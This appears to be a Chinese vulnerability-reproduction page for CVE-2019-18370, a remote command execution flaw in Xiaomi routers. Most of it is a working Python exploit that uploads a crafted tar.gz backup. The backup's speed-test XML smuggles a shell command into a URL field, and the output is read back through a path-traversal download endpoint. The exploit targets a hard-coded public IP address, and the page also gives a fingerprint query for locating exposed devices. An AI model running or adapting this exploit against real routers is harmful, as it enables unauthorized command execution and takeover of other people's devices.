# 小米 路由器 c_upload 远程命令执行漏洞 CVE-2019-18370

## 漏洞描述

小米路由器存在接口，备份文件是tar.gz格式的，上传后tar zxf解压，所以构造备份文件，可以控制解压目录的文件内容，结合测试上传下载速度功能的sh脚本执行时读取测试url列表文件，并将url部分直接进行命令拼接执行。

## 漏洞影响

```
小米 路由器
```

## 网络测绘

```
app="小米路由器"
```

## 漏洞复现

登录页面

![image-20220715110456566](images/202207151104671.png)

验证POC

```python
import os
import tarfile
import requests

# proxies = {"http":"http://127.0.0.1:8080"}
proxies = {}

## get stok
stok = input("stok: ")

## make config file
command = input("command: ")
speed_test_filename = "speedtest_urls.xml"
with open("template.xml","rt") as f:
    template = f.read()
data = template.format(command=command)
# print(data)
with open("speedtest_urls.xml",'wt') as f:
    f.write(data)

with tarfile.open("payload.tar.gz", "w:gz") as tar:
    # tar.add("cfg_backup.des")
    # tar.add("cfg_backup.mbu")
    tar.add("speedtest_urls.xml")

## upload config file
print("start uploading config file ...")
r1 = requests.post("http://101.249.46.7:8098/cgi-bin/luci/;stok={}/api/misystem/c_upload".format(stok), files={"image":open("payload.tar.gz",'rb')}, proxies=proxies)
# print(r1.text)

## exec download speed test, exec command
print("start exec command...")
r2 = requests.get("http://101.249.46.7:8098/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed".format(stok), proxies=proxies)
# print(r2.text)

## read result file
r3 = requests.get("http://101.249.46.7:8098/api-third-party/download/extdisks../tmp/1.txt", proxies=proxies)
if r3.status_code == 200:
    print("success, vul")
    print(r3.text)
```

template.xml 文件

```xml
<?xml version="1.0"?>
<root>
    <class type="1">
        <item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
        <item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
        <item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
        <item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
        <item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
        <item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
        <item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
        <item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
        <item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
        <item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
        <item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
        <item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
        <item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
        <item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
    </class>
    <class type="2">
        <item url="http://192.168.31.1 -q -O /dev/null;{command}>/tmp/1.txt;"/>
    </class>
    <class type="3">
        <item uploadurl="http://www.taobao.com/"/>
        <item uploadurl="http://www.so.com/"/>
        <item uploadurl="http://www.qq.com/"/>
        <item uploadurl="http://www.sohu.com/"/>
        <item uploadurl="http://www.tudou.com/"/>
        <item uploadurl="http://www.360doc.com/"/>
        <item uploadurl="http://www.kankan.com/"/>
        <item uploadurl="http://www.speedtest.cn/"/>
    </class>
</root>
```

接口为后台权限接口，需要通过任意文件读取漏洞获取 stok

![image-20220715110507201](images/202207151105246.png)